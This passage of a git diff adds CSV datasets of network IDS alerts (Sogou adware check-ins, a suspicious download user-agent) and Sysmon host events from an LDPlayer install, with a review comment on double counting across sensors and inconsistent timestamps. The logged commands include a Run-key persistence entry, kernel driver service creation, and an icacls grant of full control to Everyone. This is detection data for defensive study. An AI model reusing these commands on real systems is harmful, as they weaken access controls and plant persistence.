Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.622196 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.673228 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.835373 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.855040 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.023926 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.037556 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.244101 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:03.326","05/31/2020-13:20:55.292405 [**] [1:2008429:10] ET 
USER_AGENTS Suspicious User-Agent (HttpDownload) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 49.51.130.237:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:03.326","05/31-13:20:54.985752 [**] [1:2008429:10] ET USER_AGENTS Suspicious User-Agent (HttpDownload) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 49.51.130.237:80","/var/log/snort/alert.fast" diff --git a/data/MW_31_HIDS_3.csv b/data/MW_31_HIDS_3.csv new file mode 100644 index 0000000..d83bee8 --- /dev/null +++ b/data/MW_31_HIDS_3.csv 
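Review bot: Every Sogou check-in in MW_30_NIDS.csv is recorded twice, once from `/var/log/suricata/fast.log` as SID 2822075 rev 3 ("ETPRO ADWARE_PUP … Possibly Unwanted Program Detected", Priority 2) and once from `/var/log/snort/alert.fast` as SID 2822075 rev 2 ("ETPRO MALWARE … A Network Trojan was detected", Priority 1), so a row count or a group-by on classification double-counts one flow and assigns it two severities. Deduplicate on (`log.file.path`, SID, source port, destination) or document that the two sensors are to be read as independent detectors. Note also that the two sensors use different time formats inside `message` — Suricata `05/31/2020-13:26:42.179597` with a year, Snort `05/31-13:26:40.962535` without one — so a single timestamp parser will fail on half of the rows; the data dictionary should give both formats and say where the year for the Snort rows comes from.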
@@ -0,0 +1,163 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 14:19:12.184",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'c12e8a73095bad27b1cc02a25306e36f' +New md5sum is : '5002e9cbd059c227b20768b5773a5158' +Old sha1sum was: 'a0ff409933dc115dae27ec11fce7bac75925010f' +New sha1sum is : 'd451102b00da6ad0bf180b4f73a88db73c0000e8' +", +"May 31, 2020 @ 14:19:12.168",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '29446b14184e8caf0aea576ee321f0f4' +New md5sum is : '4106a3aec9d1eebddfcfbf931654376c' +Old sha1sum was: 'bb6ecadefeba5206120a42a61651b3ea7d9a4bb2' +New sha1sum is : 'dbffbab9a0cf7bfda50a68d20d36c21299d2169d' +", +"May 31, 2020 @ 14:19:08.965",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2' checksum changed. +Old md5sum was: '3d5dfdf70489c96988a67b733c998d33' +New md5sum is : '19a84742b6b5ff086df143d980ae4afe' +Old sha1sum was: 'f73c7d8c6bd7817bd8c59b3473f67f03e39e5811' +New sha1sum is : '059238efcadea262aecd701312fba26b753c1423' +", +"May 31, 2020 @ 14:19:08.512",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER' checksum changed. 
+Old md5sum was: '66f9de40f01f43922ce290fd529be6f6' +New md5sum is : 'd80d1f3cbf8f90f787a0b09282119947' +Old sha1sum was: '79b04ee91b68c25665eef548034ab27c28a642da' +New sha1sum is : '387915cc44190d01197354f7b600e1cd7ccffd55' +", +"May 31, 2020 @ 14:17:45.787",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 14:17:35.335",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 14:16:55.046",9,"Windows Application error event",,,,, +"May 31, 2020 @ 14:11:01.268",9,"Windows Application error event","""Faulting application name: LdBoxHeadless.exe, version: 5.2.30.30462, time stamp: 0x5d56672f +Faulting module name: host_manager.dll, version: 0.0.0.0, time stamp: 0x5ebd172b +Exception code: 0xc0000005 +Fault offset: 0x0000000000002847 +Faulting process id: 0x1f70 +Faulting application start time: 0x01d634eec8284a38 +Faulting application path: C:\Program Files\dnplayerext2\LdBoxHeadless.exe +Faulting module path: C:\Program Files\dnplayerext2\host_manager.dll +Report Id: 11531a4e-af43-4b76-a4d6-18b6a87534a2 +Faulting package full name: +Faulting package-relative application ID: """,,,, +"May 31, 2020 @ 14:10:30.566",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:51:33.086 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00} +ProcessId: 7284 +Image: C:\ChangZhi\LDPlayer\LDPlayer.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\LDNews +Details: 
C:\ChangZhi\LDPlayer\ldnews.exe""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LDNews","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.226796500Z"",""eventRecordID"":""2675"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:51:33.086\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00}\r\nProcessId: 7284\r\nImage: C:\\ChangZhi\\LDPlayer\\LDPlayer.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LDNews\r\nDetails: C:\\ChangZhi\\LDPlayer\\ldnews.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:51:33.086"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00105c1f1d00}"",""processId"":""7284"",""image"":""C:\\\\ChangZhi\\\\LDPlayer\\\\LDPlayer.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\LDNews"",""details"":""C:\\\\ChangZhi\\\\LDPlayer\\\\ldnews.exe""}}}","C:\\ChangZhi\\LDPlayer\\ldnews.exe" +"May 31, 2020 @ 14:10:27.581",8,"ATT&CK T1050: New Service Creation","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.365 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001089542400} +ProcessId: 7344 +Image: C:\Windows\SysWOW64\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc"" create LdBoxDrv binPath= ""C:\Program Files\dnplayerext2\LdBoxDrv.sys"" type= kernel start= auto +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""C:\\Windows\\system32\\sc\"" create LdBoxDrv binPath= \""C:\\Program Files\\dnplayerext2\\LdBoxDrv.sys\"" type= kernel start= auto",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.406430900Z"",""eventRecordID"":""2655"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.365\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001089542400}\r\nProcessId: 7344\r\nImage: C:\\Windows\\SysWOW64\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc\"" create LdBoxDrv binPath= \""C:\\Program Files\\dnplayerext2\\LdBoxDrv.sys\"" type= kernel start= auto\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.365"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001089542400}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc\\\"" create LdBoxDrv binPath= \\\""C:\\\\Program Files\\\\dnplayerext2\\\\LdBoxDrv.sys\\\"" type= kernel start= auto"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:10:13.962",10,"ATT&CK T1222: File or Folder Permissions Modifications","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:14.671 +ProcessGuid: {df9fc3d3-b3c2-5ecf-0000-0010d7612300} 
+ProcessId: 6724 +Image: C:\Windows\SysWOW64\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: ""icacls"" ""C:\ChangZhi\LDPlayer\vms"" /grant everyone:F /t +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""icacls\"" \""C:\\ChangZhi\\LDPlayer\\vms\"" /grant everyone:F /t",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:14.709897300Z"",""eventRecordID"":""2406"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:14.671\r\nProcessGuid: {df9fc3d3-b3c2-5ecf-0000-0010d7612300}\r\nProcessId: 6724\r\nImage: C:\\Windows\\SysWOW64\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: \""icacls\"" \""C:\\ChangZhi\\LDPlayer\\vms\"" /grant everyone:F /t\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:14.671"",""processGuid"":""{df9fc3d3-b3c2-5ecf-0000-0010d7612300}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""\\\""icacls\\\"" \\\""C:\\\\ChangZhi\\\\LDPlayer\\\\vms\\\"" /grant everyone:F /t"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:10:13.705",8,"ATT&CK T1035: Service Execution","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:13.820 +ProcessGuid: {df9fc3d3-b3c1-5ecf-0000-0010f9152300} +ProcessId: 8100 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System 
+Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 start cryptsvc +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300} +ParentProcessId: 8040 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: ""net"" start cryptsvc""","C:\\Windows\\system32\\net1 start cryptsvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:13.825315900Z"",""eventRecordID"":""2393"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:13.820\r\nProcessGuid: {df9fc3d3-b3c1-5ecf-0000-0010f9152300}\r\nProcessId: 8100\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 start cryptsvc\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: 
MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300}\r\nParentProcessId: 8040\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: \""net\"" start cryptsvc\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:13.820"",""processGuid"":""{df9fc3d3-b3c1-5ecf-0000-0010f9152300}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 start cryptsvc"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-b3c1-5ecf-0000-00102b092300}"",""parentProcessId"":""8040"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""\\\""net\\\"" start cryptsvc""}}}", +"May 31, 2020 @ 14:10:13.679",8,"ATT&CK T1035: Service Execution","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:13.698 +ProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300} +ProcessId: 8040 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""net"" start cryptsvc +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""net\"" start cryptsvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:13.712761100Z"",""eventRecordID"":""2392"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:13.698\r\nProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300}\r\nProcessId: 8040\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""net\"" start cryptsvc\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" 
listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:13.698"",""processGuid"":""{df9fc3d3-b3c1-5ecf-0000-00102b092300}"",""processId"":""8040"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""net\\\"" start cryptsvc"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:09:33.173",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:35.812 +ProcessGuid: {df9fc3d3-b39b-5ecf-0000-001001d41d00} +ProcessId: 7256 +Image: C:\Windows\SysWOW64\taskkill.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Terminates Processes +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: taskkill.exe +CommandLine: ""C:\Windows\System32\taskkill.exe"" /F /IM LdBoxSVC.exe /T +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: 
MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89 +ParentProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00} +ParentProcessId: 7284 +ParentImage: C:\ChangZhi\LDPlayer\LDPlayer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\\LDPlayer.exe"" -silence -downloader -openid=100 -path=""C:\ChangZhi\LDPlayer\""""","\""C:\\Windows\\System32\\taskkill.exe\"" /F /IM LdBoxSVC.exe /T",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:35.820996400Z"",""eventRecordID"":""2207"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:35.812\r\nProcessGuid: {df9fc3d3-b39b-5ecf-0000-001001d41d00}\r\nProcessId: 7256\r\nImage: 